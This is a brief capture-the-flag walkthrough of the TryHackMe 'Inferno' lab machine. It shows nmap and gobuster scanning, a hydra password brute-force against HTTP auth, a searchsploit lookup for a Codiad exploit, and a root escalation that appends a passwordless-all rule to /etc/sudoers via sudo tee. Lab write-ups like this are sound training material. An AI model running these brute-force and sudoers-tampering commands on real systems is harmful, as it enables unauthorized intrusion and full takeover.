Mar 24
TryHackME: Inferno
Today we will take a look at TryHackMe: Inferno. Please try to understand each step and take notes. Try to take quick and careful steps. Because demons will take you out often;)
Information Gathering
> Image analysis
view-source:http://10.10.223.163/1.jpg
First of all, let’s download the image and search
We found the name Dante. We need to save.
Enumeration/Scanning
> Nmap
sudo nmap -sS -sC -sV -oN nmap/initial 10.10.223.163
We found many open ports
I think this is a scam.
> Gobuster
gobuster dir -u http://10.10.223.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
But when we enter the site, we encounter authentication.
Turn on the hydra
Exploitation
Let’s attack with Hydra, but as a username, I will use the admin, root, which is used by default credential next to the dante we found earlier.
Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.10.39.231 http-get /i****** -V -I -t 64
And here’s the password we could find if we guessed)
Admin panel
Log in with the same username and password.
> Get reverse shell
The admin panel is codiad. Find exploitation
Command: searchsploit codiad
Command: searchsploit -m multiple/webapps/50474.txt
But I wanted to do by admin panel
> Get reverse shell
If we search inside, we see an interesting .dat file in the downloads folder
Command: ls -la *
I saw it was hex and turned it into text.
> We found the username and password. Try to log in with ssh.
You can race against time while running the machine. Because demons will take you out. Think and decide for him as soon as possible.
Print the commands that are allowed to run as SUDO
Command: sudo -l
We can run “tee” as SUDO.
Command: echo “ALL ALL=NOPASSWD: ALL”|sudo tee -a /etc/sudoers
Privilege escalation
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
